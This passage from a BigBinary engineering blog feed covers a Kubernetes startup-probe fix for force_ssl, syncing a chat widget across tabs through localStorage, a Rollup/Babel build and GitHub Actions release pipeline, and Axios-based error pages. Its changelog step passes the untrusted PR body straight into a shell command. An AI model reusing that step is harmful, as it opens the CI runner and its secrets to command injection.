bling-staging-web-79fc6f978-cdjf5  0/1    Running           0         5s</code></pre><p>The new pod is marked as &quot;Ready&quot;, and the old one is &quot;Terminating&quot;.</p><pre><code class="language-bash">NAME                               READY  STATUS            RESTARTS  AGE
bling-staging-web-656f74d9d-6kpzz  0/1    Terminating       0         2m38s
bling-staging-web-79fc6f978-cdjf5  1/1    Running           0         35s</code></pre><p>If we check the logs, we can see the health check request:</p><pre><code>[1] Puma starting in cluster mode...
[1] Installing dependencies...
[1] * Puma version: 6.3.1 (ruby 3.2.2-p53) (&quot;Mugi No Toki Itaru&quot;)
[1] *  Min threads: 5
[1] *  Max threads: 5
[1] *  Environment: heroku
[1] *   Master PID: 1
[1] *      Workers: 1
[1] *     Restarts: () hot () phased
[1] * Listening on http://0.0.0.0:3000
[1] Use Ctrl-C to stop
[2024-02-10T02:40:48.944785 #23]  INFO -- : [bb9e756a-51cc-4d6b-9a4a-96b0464f6740] Started GET &quot;/health_check&quot; for 192.168.120.195 at 2024-02-10 02:40:48 +0000
[2024-02-10T02:40:48.946148 #23]  INFO -- : [bb9e756a-51cc-4d6b-9a4a-96b0464f6740] Processing by HealthCheckController#healthy as */*
[2024-02-10T02:40:48.949292 #23]  INFO -- : [bb9e756a-51cc-4d6b-9a4a-96b0464f6740] Completed 200 OK in 3ms (Allocations: 691)</code></pre><p>Now, the pod is marked as &quot;Ready&quot; only after the health check succeeds; in other words, only when the server is prepared to accept the requests.</p><h3>Fixing the Startup probe for production applications</h3><p>Once we released the health check for our deployments, we found that health checks were failing for all production applications but working for staging and review applications.</p><p>We were getting the following error in our production applications.</p><pre><code class="language-bash">Startup probe failed: Get &quot;https://192.168.43.231:3000/health_check&quot;: http: server gave HTTP response to HTTPS client
2024-02-12 06:40:04 +0000 HTTP parse error, malformed request: #&lt;Puma::HttpParserError: Invalid HTTP format, parsing fails. Are you trying to open an SSL connection to a non-SSL Puma?&gt;</code></pre><p>From the above logs, it was clear that the issue was related to SSL configuration. On comparing the production environment configuration with the others, we figured out that we had enabled <a href="https://guides.rubyonrails.org/configuring.html#config-force-ssl">force_ssl</a> for production applications. 
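For reference, this setting lives in the production environment config. A minimal sketch of the standard Rails configuration (not our exact file):

```ruby
# config/environments/production.rb
Rails.application.configure do
  # Installs the ActionDispatch::SSL middleware, which redirects
  # incoming HTTP requests to their HTTPS counterparts.
  config.force_ssl = true
end
```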
The <code>force_ssl=true</code> setting ensures that all incoming requests are SSL encrypted and will automatically redirect to their SSL counterparts.</p><p>The following diagram broadly shows the path of an incoming request.</p><p><img src="/blog_images/2024/how-we-fixed-app-down-time-in-neeto-deploy/image4.png" alt="HTTPS request path"></p><p>From the above diagram, we can infer the following things:</p><ul><li>SSL verification is happening in the ingress controller and not in the server.</li><li>Client requests are going through the ingress controller before reaching the server.</li><li>The request from the ingress controller to the pod is an HTTP request.</li><li>The HTTP health check requests are directly sent from Kubelet to the pod and do not go through the ingress controller.</li></ul><p>Here is how our health check request works.</p><ol><li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/">Kubelet</a> sends an HTTP request to the server directly.</li><li>Since <code>force_ssl</code> is enabled, the <a href="https://api.rubyonrails.org/v7.1.2/classes/ActionDispatch/SSL.html">ActionDispatch::SSL</a> middleware redirects the request to HTTPS.</li><li>When the HTTPS request reaches the server, <a href="https://puma.io/">Puma</a> throws the <code>Are you trying to open an SSL connection to a non-SSL Puma?</code> error since no SSL certificates are configured with the server.</li></ol><p>The solution to our problem lies in understanding why only the health check request is rejected, whereas the request from the ingress controller is not, even though both are HTTP requests. This is because the ingress controller sets some headers before forwarding the request to the pod, and the header we are concerned about is <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-Proto">X-FORWARDED-PROTO</a>. The <code>X-Forwarded-Proto</code> header contains the HTTP/HTTPS scheme the client used to access the application. 
When a client makes an HTTPS request, the ingress controller terminates the SSL/TLS connection and forwards the request to the backend service using plain HTTP after adding the <code>X-Forwarded-Proto</code> header along with the other headers.</p><p>Everything started working after adding the <code>X-Forwarded-Proto</code> header to our startup probe request.</p><pre><code class="language-yaml">startupProbe:
  failureThreshold: 10
  httpGet:
    httpHeaders:
      - name: X-FORWARDED-PROTO
        value: https
    path: &lt;%= health_check_url %&gt;
    port: &lt;%= port %&gt;
    scheme: HTTP
  periodSeconds: 5
  successThreshold: 1
  timeoutSeconds: 60
  initialDelaySeconds: 10</code></pre><p>We also added <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/#define-readiness-probes">Readiness</a> and <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/#define-a-liveness-http-request">Liveness</a> probes for our deployments.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without any change. If you want to give NeetoDeploy a try, then please send us an email at <a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, follow NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our Slack community to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Widget state synchronisation across tabs]]></title>
       <author><name>Labeeb Latheef</name></author>
      <link href="https://www.bigbinary.com/blog/widget-synchronisation"/>
      <updated>2024-07-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/widget-synchronisation</id>
      <content type="html"><![CDATA[<p>The NeetoChat widget is the end-user-facing companion widget of our <a href="https://www.neeto.com/neetochat">NeetoChat</a> application. By embedding the NeetoChat widget on their website, NeetoChat users can easily interact with their customers in real-time.</p><p><img src="/blog_images/2024/widget-synchronisation/neeto-chat.png" alt="NeetoChat chat screen"></p><p>The NeetoChat widget has a feature to synchronize its state, in real-time, across other widget instances you might have open in any other tab or window. This ability gives users the illusion of interacting with the same widget instance across tabs and provides a sense of continuity. For example, user interactions such as navigating to another page or minimizing/maximizing the widget performed on a widget instance in one tab are reflected across widgets in every other tab.</p><p>In reality, a widget or the underlying script cannot be shared between multiple browser contexts (tabs, windows, etc). All scripts in a context run in an isolated environment, strictly separate from other executing contexts. However, there are methods we can use to enable communication between two browser contexts. Some of the popular choices are listed below. With a proper communication channel set in place, two widget instances can notify each other about their user interactions and state updates in real time to stay synchronized.</p><ol><li>Use the <strong>BroadcastChannel</strong> API</li><li>Use a <strong>localStorage</strong> change listener</li><li>Use the <strong>window.postMessage()</strong> method</li><li>Use Service Worker post messages</li></ol><p>With ease of implementation and compatibility across different browser environments in mind, we have chosen to implement this feature using the localStorage change listener. The details of the implementation can be split into two parts.</p><h5>1. 
Navigation Checkpoint:</h5><p>When opening a new widget instance in a new tab or window, the widget resumes from the last checkpoint, allowing the users to continue from where they left off. This implementation is pretty straightforward. Whenever the URL pathname changes, we keep a reference in localStorage called &quot;checkpoint&quot;.</p><pre><code class="language-jsx">const Router = ({ children }) =&gt; {
  const history = useHistory();
  const pathname = history.location.pathname;

  const addCheckPoints = pathname =&gt; {
    // Check if the current pathname matches any allowed routes.
    // Only navigations to main pages are allowed to be added as checkpoints.
    const isAllowed = ALLOWED_CHECKPOINT_ROUTES.some(route =&gt;
      matchPath(pathname, { path: route, exact: true, strict: true })
    );

    // Writes the pathname to localStorage with a unique identifier
    if (isAllowed) localStorage.setItem(&quot;checkpoint&quot;, pathname);
  };

  // Run for every pathname change
  useEffect(() =&gt; {
    addCheckPoints(pathname);
  }, [pathname]);

  return &lt;App /&gt;;
};</code></pre><p>Now, upon initializing a new widget instance, we check localStorage for any existing checkpoint and set this as the initial route, presenting the user with the same screen they visited last time.</p><pre><code class="language-jsx">const history = useHistory();

// Run on initial mount
useEffect(() =&gt; {
  const checkpoint = localStorage.getItem(&quot;checkpoint&quot;);

  // Replace initial route with checkpoint from localStorage.
  if (checkpoint) history.replace(checkpoint);
}, []);</code></pre><h5>2. Real-time Synchronisation:</h5><p>The above implementation only allows a new widget instance to start from the last checkpoint. From this point onwards, each state update (minimize, maximize) and user navigation in one widget has to be synchronized in real time with active widget instances in other tabs to maintain the same appearance across the tabs. 
At the core, this communication is enabled by adding a custom React hook called <code>useWindowMessenger</code>. The <code>useWindowMessenger</code> hook relies on localStorage values and localStorage change listeners for sending messages or events across different browser contexts.</p><pre><code class="language-javascript">const storageKey = `__some_unique_localStorage_key__`;
const origin = window.location.origin;
const windowId = uuid(); // Assigns a unique id for each browser context.

const createPayload = message =&gt; {
  const payload = {};
  payload.message = message;
  payload.meta = {};
  payload.meta.origin = origin;
  payload.meta.window = windowId;

  return JSON.stringify(payload);
};

const useWindowMessenger = messageHandler =&gt; {
  const messageHandlerRef = useRef();
  messageHandlerRef.current = messageHandler;

  const sendMessage = useCallback(message =&gt; {
    const payload = createPayload(message);

    // A new item is set in localStorage and immediately removed;
    // this is sufficient to get the 'storage' event to be fired.
    localStorage.setItem(storageKey, payload);
    localStorage.removeItem(storageKey);
  }, []);

  useEffect(() =&gt; {
    if (typeof messageHandlerRef.current !== &quot;function&quot;) return;

    const handleStorageChange = event =&gt; {
      if (event.key !== storageKey) return;
      if (!event.newValue) return;

      const { message, meta } = JSON.parse(event.newValue);

      // Every window has a unique `windowId` attached.
      // If the event originated from the same `window`, the event is ignored.
      if (meta.window === windowId || meta.origin !== origin) return;

      messageHandlerRef.current(message);
    };

    // The `storage` event is fired whenever value updates are sent to localStorage
    window.addEventListener(&quot;storage&quot;, handleStorageChange);

    return () =&gt; {
      window.removeEventListener(&quot;storage&quot;, handleStorageChange);
    };
  }, [messageHandlerRef]);

  return sendMessage;
};

export default useWindowMessenger;</code></pre><p>In essence, the useWindowMessenger hook returns a <code>sendMessage</code> function that can be used to send a message to widget instances in other tabs. Also, it accepts a <code>messageHandler</code> callback that can receive and handle the messages sent by other instances.</p><p>Now, when one widget instance emits state and navigation change events, other widget instances handle these events to make the necessary updates to their internal state to mirror the changes. Below is a simplified example of how this was done in the NeetoChat widget.</p><pre><code class="language-javascript">import { useCallback, useEffect } from &quot;react&quot;;
import { useHistory } from &quot;react-router-dom&quot;;

// useLocalStorage is an in-house implementation that syncs its state value into localStorage and restores the last value on next load.
import useLocalStorage from &quot;@hooks/useLocalStorage&quot;;
import useWindowMessenger from &quot;@hooks/useWindowMessenger&quot;;

export const MESSAGE_TYPES = {
  STATE_UPDATE: &quot;STATE_UPDATE&quot;,
  PATH_UPDATE: &quot;PATH_UPDATE&quot;,
};

const useWidgetState = () =&gt; {
  // This internal state controls widget visibility and other behaviours.
  const [widgetState, setWidgetState] = useLocalStorage(
    &quot;widgetState&quot;, // Unique localStorage key
    { maximized: false }
  );

  const history = useHistory();
  const pathname = history.location.pathname;

  const sendMessage = useWindowMessenger(message =&gt;
    handleMessageTypes(message.type, message.payload)
  );

  const handleMessageTypes = (type, payload) =&gt; {
    switch (type) {
      // Actions such as minimize, maximize are received as &quot;STATE_UPDATE&quot;
      case MESSAGE_TYPES.STATE_UPDATE:
        // Payload contains new state values.
        // Commit new value updates to the internal state that controls the widget.
        setWidgetState(prevState =&gt; ({ ...prevState, ...payload }));
        break;

      // User navigation actions are received as &quot;PATH_UPDATE&quot;
      case MESSAGE_TYPES.PATH_UPDATE:
        // Payload contains the new pathname.
        // Navigate to the page if not already on the same page.
        if (history.location.pathname !== payload) history.push(payload);
        break;

      default:
        console.warn(`Unhandled message type: ${type}`);
    }
  };

  // This function extends `setWidgetState` by adding the ability to emit a `STATE_UPDATE` event for each state update call.
  const updateWidgetState = useCallback(async update =&gt; {
    let nextState;
    await setWidgetState(prevState =&gt; {
      nextState = { ...prevState, ...update };

      return nextState;
    });

    sendMessage({ type: MESSAGE_TYPES.STATE_UPDATE, payload: nextState });
  }, []);

  // Send a &quot;PATH_UPDATE&quot; event for every path change in the active widget.
  useEffect(() =&gt; {
    sendMessage({
      type: MESSAGE_TYPES.PATH_UPDATE,
      payload: pathname,
    });
  }, [pathname]);

  return [widgetState, updateWidgetState];
};</code></pre><p>With the above setup, all the widget instances in different tabs act like a single widget by mirroring the actions from the active instance.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we build, release and maintain frontend packages]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/build-release-frontend-packages"/>
      <updated>2024-06-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/build-release-frontend-packages</id>
      <content type="html"><![CDATA[<p>Here at <a href="https://www.neeto.com/">neeto</a>, we build and manage a <a href="https://blog.neeto.com/p/neeto-products-and-people">lot of products</a>. Each product has its own team. However, ensuring consistent design and functionalities across these products poses a significant challenge. To aid our product teams in focusing on their core business logic, we've organized common functionalities into separate packages.</p><p>In this blog, we'll look into how we build, release, and maintain these packages to support our product development cycles. Let's take a look at some of these key packages.</p><h3>neeto-cist</h3><p><a href="https://github.com/bigbinary/neeto-cist">neeto-cist</a> contains essential pure utility functions and forms the backbone of our development framework.</p><h3>neeto-ui</h3><p><a href="https://github.com/bigbinary/neeto-ui">neeto-ui</a> is the foundational design structure for our Neeto products. It contains basic-level components like Buttons, Input fields, etc.</p><h3>neeto-molecules</h3><p>Built on top of <code>neeto-ui</code>, the <code>neeto-molecules</code> package houses reusable UI elements like a login page, settings page, sidebars, etc. It simplifies the creation of consistent user experiences across Neeto products.</p><h3>neeto-commons</h3><p><code>neeto-commons</code> stores crucial elements such as initializers, constants, hooks and configurations shared across our entire product range. 
We wrote in great detail about the <a href="https://www.bigbinary.com/blog/neeto-commons-frontend">challenges we faced while building neeto-commons</a>.</p><p>Let's look at how we build, release, and maintain these packages.</p><h2>Build</h2><p>In general, we use <a href="https://babeljs.io/">Babel</a> to transpile and <a href="https://rollupjs.org">Rollup</a> to bundle, with some exceptions.</p><p>Let's look at our standard build configuration.</p><pre><code class="language-js">import peerDepsExternal from &quot;rollup-plugin-peer-deps-external&quot;;
import svgr from &quot;@svgr/rollup&quot;;
import babel from &quot;@rollup/plugin-babel&quot;;
import resolve from &quot;@rollup/plugin-node-resolve&quot;;
import alias from &quot;@rollup/plugin-alias&quot;;
import json from &quot;@rollup/plugin-json&quot;;
import commonjs from &quot;@rollup/plugin-commonjs&quot;;
import styles from &quot;rollup-plugin-styles&quot;;
import aliases from &quot;./aliases&quot;;

export default {
  input: {
    Component1: &quot;src/components/Component1&quot;,
    Component2: &quot;src/components/Component2&quot;,
    //... rest of the entry points
  },
  output: [&quot;esm&quot;, &quot;cjs&quot;].map(format =&gt; ({
    format,
    sourcemap: true,
    //... other options
  })),
  plugins: [
    // To automatically externalize peerDependencies in a Rollup bundle.
    peerDepsExternal(),
    // Inline any svg files
    svgr(),
    // To integrate Rollup and Babel.
    babel({
      exclude: &quot;node_modules/**&quot;,
      babelHelpers: &quot;runtime&quot;,
    }),
    // To use third party modules from node_modules
    resolve({ extensions: [&quot;.js&quot;, &quot;.jsx&quot;, &quot;.svg&quot;] }),
    // To define aliases while bundling package.
    alias({ entries: aliases }),
    // To convert .json files to ES6 modules.
    json(),
    // To convert CommonJS modules to ES6.
    commonjs(),
    // Handle styles
    styles({
      minimize: true,
      extensions: [&quot;.css&quot;, &quot;.scss&quot;, &quot;.min.css&quot;],
    }),
  ],
};</code></pre><p>When dealing with multiple entry points, passing an array as <code>input</code> is a common mistake. The problem with an <code>input</code> array is that shared code will be duplicated across the bundles. So, the best approach here is to pass a key-value object. This way, Rollup will create separate files for shared code and reuse them everywhere.</p><p>Looking at the <code>output</code>, notice that we build for both the CommonJS and ECMAScript module formats. Even though we don't have any Node.js projects (we are mainly a Rails company), we still need the CommonJS format to run Jest tests and some scripts for build and automation purposes.</p><p>When using Babel to transpile and Rollup to bundle, we ran into some configuration pain points. The <a href="https://www.npmjs.com/package/@rollup/plugin-babel"><code>@rollup/plugin-babel</code></a> plugin made the configuration far easier. <a href="https://www.npmjs.com/package/@svgr/rollup"><code>@svgr/rollup</code></a> converts normal SVG files to React components. <a href="https://www.npmjs.com/package/rollup-plugin-peer-deps-external"><code>rollup-plugin-peer-deps-external</code></a> automatically externalizes peer dependencies, keeping the bundle lean. Even though we don't have any CommonJS modules, it's better to add <a href="https://www.npmjs.com/package/@rollup/plugin-commonjs"><code>@rollup/plugin-commonjs</code></a> so that any CommonJS module hiding deep down the dependency rabbit hole is still converted.</p><p>Above is a simplified version of the Rollup configuration we use in <code>neeto-cist</code>, <code>neeto-ui</code> and <code>neeto-molecules</code>. We took a much simpler approach when building <code>neeto-commons</code>.
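</p><p>As an aside on the keyed entry-point approach described above, here is a small, hypothetical sketch (the helper and entry names are ours, not from the real config) of generating such an <code>input</code> map from a list of entry files:</p><pre><code class="language-js">const path = require("path");

// Hypothetical helper: build a keyed Rollup `input` object from a list of
// entry files. With an object (rather than an array), Rollup emits shared
// code as separate chunks and reuses them across entries.
const buildInput = entryFiles =>
  Object.fromEntries(
    entryFiles.map(file => [path.basename(file, path.extname(file)), file])
  );

const input = buildInput([
  "src/components/Component1.jsx",
  "src/components/Component2.jsx",
]);
// input.Component1 === "src/components/Component1.jsx"
</code></pre><p>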
The reason for abandoning bundling for <code>neeto-commons</code> is that within this package, we have a variety of commonly used elements, such as components, hooks, initializers, constants, utils, etc., each with varying sizes and dependency requirements. If the host project only wants to use a few simple util functions, we don't want it to be served the entire bundle and forced to install lots of dependencies.</p><p>Instead of serving everything from the root <code>index.js</code>, we use the <a href="https://webpack.js.org/guides/package-exports/"><code>exports</code></a> field in the <code>package.json</code> to specify which files can be imported by the host project. Below is a sample of our exports.</p><pre><code class="language-json">&quot;exports&quot;: {
  &quot;./react-utils&quot;: {
    &quot;import&quot;: &quot;./react-utils/index.js&quot;,
    &quot;require&quot;: &quot;./cjs/react-utils/index.js&quot;,
    &quot;types&quot;: &quot;./react-utils.d.ts&quot;
  },
  &quot;./react-utils/*&quot;: {
    &quot;import&quot;: &quot;./react-utils/*&quot;,
    &quot;require&quot;: &quot;./cjs/react-utils/*&quot;,
    &quot;types&quot;: &quot;./react-utils.d.ts&quot;
  },
  &quot;./utils&quot;: {
    &quot;import&quot;: &quot;./utils/index.js&quot;,
    &quot;require&quot;: &quot;./cjs/utils/index.js&quot;,
    &quot;types&quot;: &quot;./utils.d.ts&quot;
  },
  &quot;./utils/*&quot;: {
    &quot;import&quot;: &quot;./utils/*&quot;,
    &quot;require&quot;: &quot;./cjs/utils/*&quot;,
    &quot;types&quot;: &quot;./utils.d.ts&quot;
  },
  &quot;./initializers&quot;: {
    &quot;import&quot;: &quot;./initializers/index.js&quot;,
    &quot;require&quot;: &quot;./cjs/initializers/index.js&quot;,
    &quot;types&quot;: &quot;./initializers.d.ts&quot;
  },
  &quot;./constants&quot;: {
    &quot;import&quot;: &quot;./constants/index.js&quot;,
    &quot;require&quot;: &quot;./cjs/constants/index.js&quot;,
    &quot;types&quot;: &quot;./constants.d.ts&quot;
  }
}</code></pre><p>We export, for example,
<code>./react-utils</code> and <code>./react-utils/*</code> because we want to support both import styles below.</p><pre><code class="language-js">import { useLocalStorage } from &quot;neetocommons/react-utils&quot;;</code></pre><pre><code class="language-js">import useLocalStorage from &quot;neetocommons/react-utils/useLocalStorage&quot;;</code></pre><p>We initially employed the first import style, but as we expanded, we recognized the necessity of supporting a more concise approach in smaller projects. This second style involves importing solely the target file without additional dependencies, significantly improving tree-shaking capabilities.</p><p>We also ensure we build for <code>esm</code> and <code>cjs</code>. Below is our simplified Babel config.</p><pre><code class="language-js">const defaultConfigurations = require(&quot;./defaultConfigurations&quot;);

const alias = {
  assets: &quot;./src/assets&quot;,
  neetocist: &quot;@bigbinary/neeto-cist&quot;,
  // others
};

module.exports = function (api) {
  const config = defaultConfigurations(api);
  config.sourceMaps = true;
  config.plugins.push(
    [&quot;module-resolver&quot;, { root: [&quot;./src&quot;], alias }],
    &quot;inline-react-svg&quot;
  );
  if (process.env.BABEL_MODE === &quot;commonjs&quot;) {
    config.overrides = [
      {
        presets: [[&quot;@babel/preset-env&quot;, { modules: &quot;commonjs&quot; }]],
      },
    ];
  }
  return config;
};</code></pre><p>When transpiling, we ensure aliases are correctly resolved, and if there are any SVG files, we inline them using the <a href="https://www.npmjs.com/package/babel-plugin-inline-react-svg"><code>inline-react-svg</code></a> plugin to make life easy for the host application.
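</p><p>Relatedly, the <code>exports</code> map shown earlier can be understood with a rough sketch of conditional subpath resolution (our own simplification for illustration, not Node's actual algorithm):</p><pre><code class="language-js">// Mirrors the "exports" entries from the package.json sample above.
const exportsMap = {
  "./react-utils": {
    import: "./react-utils/index.js",
    require: "./cjs/react-utils/index.js",
  },
  "./react-utils/*": {
    import: "./react-utils/*",
    require: "./cjs/react-utils/*",
  },
};

const resolveSubpath = (subpath, condition = "import") => {
  // An exact match wins, e.g. importing "neetocommons/react-utils".
  if (exportsMap[subpath]) return exportsMap[subpath][condition];

  // Otherwise try wildcard patterns, substituting the matched suffix.
  for (const [pattern, targets] of Object.entries(exportsMap)) {
    const prefix = pattern.endsWith("/*") ? pattern.slice(0, -1) : null;
    if (prefix) {
      if (subpath.startsWith(prefix)) {
        return targets[condition].replace("*", subpath.slice(prefix.length));
      }
    }
  }

  return null;
};

resolveSubpath("./react-utils"); // "./react-utils/index.js"
resolveSubpath("./react-utils/useLocalStorage", "require"); // "./cjs/react-utils/useLocalStorage"
</code></pre><p>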
Below is our build script.</p><pre><code class="language-json">&quot;scripts&quot;: {
  &quot;build:pre&quot;: &quot;del-cli dist&quot;,
  &quot;build:es&quot;: &quot;babel --extensions \&quot;.js,.jsx\&quot; src --out-dir=dist&quot;,
  &quot;build:cjs&quot;: &quot;BABEL_MODE=commonjs babel --extensions \&quot;.js,.jsx\&quot; src --out-dir=dist/cjs&quot;,
  &quot;build:post&quot;: &quot;node ./.scripts/post-build.mjs&quot;,
  &quot;build&quot;: &quot;yarn build:pre &amp;&amp; yarn build:es &amp;&amp; yarn build:cjs &amp;&amp; yarn build:post&quot;,
}</code></pre><h2>Release</h2><p>We did not want to create a release every time we merged a PR, and we also didn't want to manually release packages every time. Instead, we rely on GitHub labels while running GitHub Actions to do the release.</p><p>We created three labels specifically for this purpose: <code>patch</code>, <code>minor</code> and <code>major</code>. As the names suggest, these labels help us create <code>patch</code>, <code>minor</code> and <code>major</code> versions. When we create a PR and want a release on merge, we attach one of these labels, and the GitHub Action will create the release accordingly.</p><pre><code class="language-yaml">name: &quot;Create and publish releases&quot;

on:
  pull_request:
    branches:
      - main
    types: [closed]

jobs:
  release:
    name: &quot;Create Release&quot;
    runs-on: ubuntu-latest
    if: &gt;-
      ${{ github.event.pull_request.merged == true &amp;&amp; (
      contains(github.event.pull_request.labels.*.name, 'patch') ||
      contains(github.event.pull_request.labels.*.name, 'minor') ||
      contains(github.event.pull_request.labels.*.name, 'major') ) }}</code></pre><p>As evident from the code above, we trigger the <code>Create and publish releases</code> GitHub Action only if any of the three aforementioned labels are present.
Once that condition is met, we proceed to use <a href="https://classic.yarnpkg.com/lang/en/docs/cli/version/"><code>yarn version</code></a> to update the version.</p><pre><code class="language-yaml">- name: Bump the patch version and create a git tag on release
  if: ${{ contains(github.event.pull_request.labels.*.name, 'patch') }}
  run: yarn version --patch --no-git-tag-version

- name: Bump the minor version and create a git tag on release
  if: ${{ contains(github.event.pull_request.labels.*.name, 'minor') }}
  run: yarn version --minor --no-git-tag-version

- name: Bump the major version and create a git tag on release
  if: ${{ contains(github.event.pull_request.labels.*.name, 'major') }}
  run: yarn version --major --no-git-tag-version</code></pre><p>Then, we extract changelogs from the PR's title and description.</p><pre><code class="language-yaml">- name: Extract changelog
  id: CHANGELOG
  run: |
    content=$(echo '${{ steps.PR.outputs.pr_body }}' | python3 -c 'import json; import sys; print(json.dumps(sys.stdin.read().partition(&quot;**Description**&quot;)[2].partition(&quot;**Checklist**&quot;)[0].strip()))')
    echo &quot;CHANGELOG=${content}&quot; &gt;&gt; $GITHUB_ENV
  shell: bash

- name: Update Changelog
  continue-on-error: true
  uses: stefanzweifel/changelog-updater-action@v1
  with:
    latest-version: ${{ steps.package-version.outputs.version }}
    release-notes: ${{ fromJson(env.CHANGELOG) }}</code></pre><p>Finally, we publish the package to NPM.</p><pre><code class="language-yaml">- name: Publish the package on NPM
  uses: JS-DevTools/npm-publish@v3
  with:
    access: &quot;public&quot;
    token: ${{ secrets.NPM_TOKEN }}</code></pre><h2>Maintenance</h2><p>Now that the release is done, we need to propagate changes to our products. For example, we may have extracted an existing functionality from one of the packages.
Here is an example of <a href="https://www.bigbinary.com/blog/how-we-standardized-keyboard-shortcuts">how we standardized keyboard shortcuts in neeto</a> and extracted them into a package. Now, the product team needs to remove that functionality and use it from the package. Reaching out to each team and asking them to replace it can be tedious, especially considering their priorities. So we came up with a plan to use custom <a href="https://eslint.org/docs/latest/extend/custom-rules">ESLint rules</a> to enforce them, and we built <code>eslint-plugin-neeto</code>.</p><p>Let's look at a few examples of how we use <code>eslint-plugin-neeto</code> to enforce changes on the product team.</p><p>There are some third-party packages we decided not to use once we found better alternatives; some of them were even our own. For example, <code>bootstrap</code>, <code>moment.js</code>, <code>@bigbinary/neeto-utils</code>, etc. To enforce this, we created an ESLint rule called <code>no-blacklisted-imports</code>. This rule throws a lint error if developers attempt to commit changes that include these blacklisted imports.</p><p>Another example is that we moved higher-level constants, commonly utilized across various products, to <code>neeto-commons</code>. To enforce this, we created an ESLint rule called <code>use-common-constants</code>. This rule detects any local imports and recommends importing from <code>neeto-commons</code> instead.</p><p>Here is another great blog post in which we explained the challenges we faced while <a href="https://www.bigbinary.com/blog/react-localization">adding translations and enforcing them using ESLint and Babel plugins</a>.</p><p>These are just a few of the many ESLint and Babel plugins we created.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we automated displaying error pages based on API responses]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/automatically-displaying-errors"/>
      <updated>2024-05-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/automatically-displaying-errors</id>
      <content type="html"><![CDATA[<p>Error handling is an important aspect of building software. We've automated error handling wherever possible so that we can deal with it in a consistent manner. By automating this process, we've allowed our product engineers to focus on shipping quality software.</p><p>This blog is about how we automated handling and displaying error pages in <a href="https://www.neeto.com/">neeto</a> applications.</p><p>Before we jump in, let's look at <a href="https://axios-http.com/">Axios</a> and <a href="https://github.com/pmndrs/zustand">Zustand</a>, two npm packages we heavily rely on.</p><h4>Axios</h4><p>We use <a href="https://axios-http.com/">Axios</a> to make API calls. Axios allows us to intercept API calls and modify them if necessary.</p><pre><code class="language-js">axios.interceptors.request.use(request =&gt; {
  // intercept requests
});

axios.interceptors.response.use(response =&gt; {
  // intercept responses
});</code></pre><p>This feature is useful for tasks such as setting authentication tokens, handling case conversion for requests and responses, cleaning up sensitive headers when sending requests to third-party domains, etc. This is also a good place to universally handle any errors on API calls.</p><h4>Zustand</h4><p><a href="https://github.com/pmndrs/zustand">Zustand</a> is a small, fast, scalable, barebones state management solution using simplified flux principles. We use Zustand for state management instead of Redux/React context.
Here is a simple example of how to create a store using Zustand.</p><pre><code class="language-js">import { create } from &quot;zustand&quot;;

const useBearStore = create(set =&gt; ({
  bears: 0,
  increasePopulation: () =&gt; set(state =&gt; ({ bears: state.bears + 1 })),
  removeAllBears: () =&gt; set({ bears: 0 }),
}));</code></pre><p>To learn more about Zustand, check out their <a href="https://zustand-demo.pmnd.rs/">documentation</a>.</p><h3>Detecting errors</h3><p>Let's look into how we handle errors in our applications. As a first step, let's examine the universal Axios response interceptor we wrote to detect any error.</p><pre><code class="language-js">import axios from &quot;axios&quot;;

axios.interceptors.response.use(null, error =&gt; {
  if (error.response?.status === 401) {
    resetAuthTokens();
    window.location.href = `/login?redirect_uri=${encodeURIComponent(
      window.location.href
    )}`;
  } else {
    const fullUrl = error.request?.responseURL || error.config.url;
    const status = error.response?.status;
    // TODO: Notify the user that an error has occurred.
  }
  return Promise.reject(error);
});</code></pre><p>For each response, if it detects a 401 HTTP error, the code resets the authentication tokens and redirects the user to the login page. For any other error, we need to notify the user with an appropriate message.</p><h3>Storing errors</h3><p>When an error happens, the user could be on any page, so we should be able to display an error message no matter which page the user is on. For that, we need to store the error in a way that it can be retrieved from anywhere. This is where Zustand comes into play.
It is very easy to create a store in Zustand, and it can be used as a hook in React applications.</p><pre><code class="language-js">import { prop } from &quot;ramda&quot;;
import { create } from &quot;zustand&quot;;

const useDisplayErrorPage = () =&gt; useErrorDisplayStore(prop(&quot;showErrorPage&quot;));

export const useErrorDisplayStore = create(() =&gt; ({
  showErrorPage: false,
  statusCode: 404,
  failedApiUrl: &quot;&quot;,
}));

export default useDisplayErrorPage;</code></pre><p>The code snippet above creates a Zustand store for storing error-related data. Additionally, it provides a hook that conveniently checks whether an error has occurred anywhere within the application.</p><p>Back to our Axios interceptor: we can store the error in the <code>useErrorDisplayStore</code> store.</p><pre><code class="language-js">import axios from &quot;axios&quot;;

import { useErrorDisplayStore } from &quot;./useDisplayErrorPage&quot;;

axios.interceptors.response.use(null, error =&gt; {
  if (error.response?.status === 401) {
    resetAuthTokens();
    window.location.href = `/login?redirect_uri=${encodeURIComponent(
      window.location.href
    )}`;
  } else {
    const fullUrl = error.request?.responseURL || error.config.url;
    const status = error.response?.status;
    useErrorDisplayStore.setState({
      showErrorPage: true,
      statusCode: status,
      failedApiUrl: fullUrl,
    });
  }
  return Promise.reject(error);
});</code></pre><h3>Display errors</h3><p>Now, we can use the <code>useDisplayErrorPage</code> hook at the root of our React application.
When an error happens, <code>showErrorPage</code> will become <code>true</code>; we can use that to show an error page.</p><pre><code class="language-jsx">import useDisplayErrorPage from &quot;./useDisplayErrorPage&quot;;
import ErrorPage from &quot;./ErrorPage&quot;;

const Main = () =&gt; {
  const showErrorPage = useDisplayErrorPage();

  if (showErrorPage) {
    return &lt;ErrorPage /&gt;;
  }

  return &lt;&gt;Our App&lt;/&gt;;
